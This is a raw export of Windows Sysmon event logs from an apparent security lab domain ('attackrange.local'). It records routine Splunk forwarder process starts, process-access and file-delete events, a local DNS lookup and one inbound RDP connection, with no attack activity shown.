09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D1E-6151-8100-00000000FD01}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D1E-6151-8100-00000000FD01}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.319{5EBD8912-8D1E-6151-8100-00000000FD01}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.006{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D168D0E7B93CFDF54700C90829153F84,SHA256=93D719304A6602369EBDA7033B19FFF26FCF6D5789E453FBE3FC536E925646CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980847Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:35.537{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC541F11DAA3207048BB845386B2D694,SHA256=4D9B8401FFAEAA6729E3E5B6E1D828DF53CCAFEE01C4632A53CA9568A8D94395,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.530{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com56526-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001055056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:35.240{5EBD8912-8D1E-6151-8200-00000000FD01}33083300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:35.069{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D3C85BF5D607D3259AACCA26BF64E7,SHA256=9D8EDFA3F5C5F3A0335A18E8F201DEB03DE4768B59BCF5E3E918BA3B79E1AB65,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D1E-6151-8200-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D20-6151-8300-00000000FD01}428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D20-6151-8300-00000000FD01}428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.569{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D20-6151-8300-00000000FD01}428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.570{5EBD8912-8D20-6151-8300-00000000FD01}428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.147{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C10254157EF88C5A32A4F9E3DCAFD3F,SHA256=119F696332074101A84C31B99A6AF063F5AF8D67B38C54345330A966EC8DD41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:36.147{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45E7025F6B6E9450FFC9A60B20F7CDF2,SHA256=D9BE31C9069FE058662EBE59DA5FE55F5285AFBDC493B951E280C0409FD2E01A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980848Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:36.630{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9696A6A2E5AE09DDAFF8657424CDB2EF,SHA256=61AEA819BDCA572911FE35AFFF34690F4024CAF83F560BFA91FFD2CFAAF0AB78,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:35.420{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53651- 23542300x80000000000000001055074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:37.569{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5046E49D76A0D0A54AF54655CF06C59,SHA256=EA6F57948A06B1CC547903BAB06B1AD0428BEE44D0E02BBDC92A66AF96161556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:37.382{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5273DF9EFD0814B3149F0515B86BDA86,SHA256=4DFAF3B351618E354A425EEFCDA096E0510050AC386FB595EAC8E3D26AA05556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980864Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.771{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=891286582D2C197A11453D3816320DDD,SHA256=1C9A61D0688EB50F61BEC3402F8506F1E68C05BC7C3E5B1BC0E3E40A1B0A3609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980863Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.771{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D5371454FC2A65B4FB816FBCCF84F50,SHA256=A459DBAF23CD6D0AB2FE60B8F08A2E9BD9CBFB58CB6A7CF95C88C04F0BFFB58A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980862Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.646{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E884AAEF4C3633CB10A20E243CCC30,SHA256=16076E72041F1838D5095DAF25E810A681727F1AF5605CADD527D1FE6E52B48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980861Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:37.458{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D21-6151-0C7A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980860Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 